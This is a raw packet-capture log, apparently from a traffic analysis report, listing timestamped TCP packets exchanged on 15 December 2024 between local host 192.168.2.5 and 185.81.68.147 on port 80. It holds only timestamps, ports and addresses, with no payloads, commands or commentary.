                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.026119947 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.027038097 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.027095079 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.027163029 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.028343916 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.028410912 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.028503895 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.029341936 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.029414892 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.029469967 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.030493975 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.030605078 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.030702114 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.031696081 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.031757116 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.031800032 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.032912970 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.032974958 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.033068895 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.034207106 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.034285069 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.034321070 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.035135031 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.035207033 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.035228968 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.036330938 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.036395073 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.036469936 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.037451029 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.037573099 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.037676096 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.038630962 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.038686991 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.038724899 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.039824009 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.039890051 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.039895058 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.040941954 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.041007996 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.041124105 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.222439051 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.222588062 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.222676039 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.223618984 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.223776102 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.223855019 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.224754095 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.224874020 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.224965096 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.225939035 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.226027966 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.226114035 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.227102995 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.227232933 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.227338076 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.228241920 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.228331089 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.228410959 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.229407072 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.229558945 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.229640961 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.230645895 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.230732918 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.230813980 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.231704950 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.231863976 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.231944084 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.232935905 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.233088970 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.233180046 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.234096050 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.234170914 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.234256983 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.235282898 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.235316992 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.235404968 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.236329079 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.236439943 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.236522913 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.237575054 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.237719059 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.237803936 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.238666058 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.238756895 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.238836050 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.239845991 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.239986897 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.240097046 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.241187096 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.241409063 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.241524935 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.242155075 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.242276907 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.243355989 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.243438959 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.243463039 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.243491888 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.244518995 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.244616985 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.244810104 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.245877981 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.245944023 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.246032953 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.246798038 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.246898890 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.247919083 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.247975111 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.248060942 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.248145103 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.249109983 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.249233961 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.249325037 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.250272036 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.250374079 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.250480890 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.251442909 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.251558065 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.251646042 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.252557039 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.301892042 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.383975983 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.384159088 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.384253979 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.384404898 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.384515047 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.384550095 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.385510921 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.385623932 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.385668039 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.386657953 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.386786938 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.386830091 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.387875080 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.387937069 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.387979031 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.388986111 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.389094114 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.389131069 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.440222025 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.440305948 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.441277981 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.441400051 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.441483021 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.442426920 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.442564964 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.442636967 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.443618059 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.443739891 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.443809032 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.444720030 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.489423037 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.575911999 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.576014996 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.576107025 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.576436043 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.576582909 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.576678991 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.577554941 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.577999115 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.578066111 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.578218937 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.579159975 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.579229116 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.579291105 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.580358982 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.580447912 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.580473900 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.581475973 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.581535101 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.581589937 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.582638025 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.582765102 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.582793951 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.583818913 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.583878994 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.583951950 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.584976912 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.585036993 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.585050106 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.586167097 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.586222887 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.586247921 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.587335110 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.587405920 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.587430954 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.588428020 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.588483095 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.588542938 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.589632034 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.589688063 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.589704037 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.590778112 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.590835094 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.590861082 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.591944933 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.592019081 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.592061996 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.593156099 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.593218088 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.593261957 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.594274998 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.594329119 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.594372034 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.595496893 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.595551968 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.595565081 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.596575975 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.596635103 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.596694946 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.597759962 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.597826004 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.597887993 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.598922014 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.598969936 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.598995924 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.600277901 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.600342035 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.600361109 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.601234913 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.601310968 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.601382971 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.602385044 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.602444887 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.602468967 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.603585958 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.603642941 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.603705883 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.604758978 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.604835987 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.604898930 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.605917931 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.605963945 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.605976105 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.607001066 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.607048988 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.607121944 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.788311958 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.788394928 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.788477898 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.789467096 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.789582014 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.789654016 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.790652037 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.790818930 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.790899038 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.791770935 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.791902065 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.791982889 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.792963982 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.793052912 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.793139935 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.794212103 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.794312954 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.794403076 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.795281887 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.795407057 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.795500994 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.796504974 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.796591043 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.796673059 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.797631979 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.797771931 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.797849894 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.798768997 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.798861980 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.798943043 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.799923897 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.800031900 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.800107956 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.801075935 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.801162958 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.801239014 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.802223921 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.802334070 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.802422047 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.803390980 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.803527117 CET8049708185.81.68.147192.168.2.5
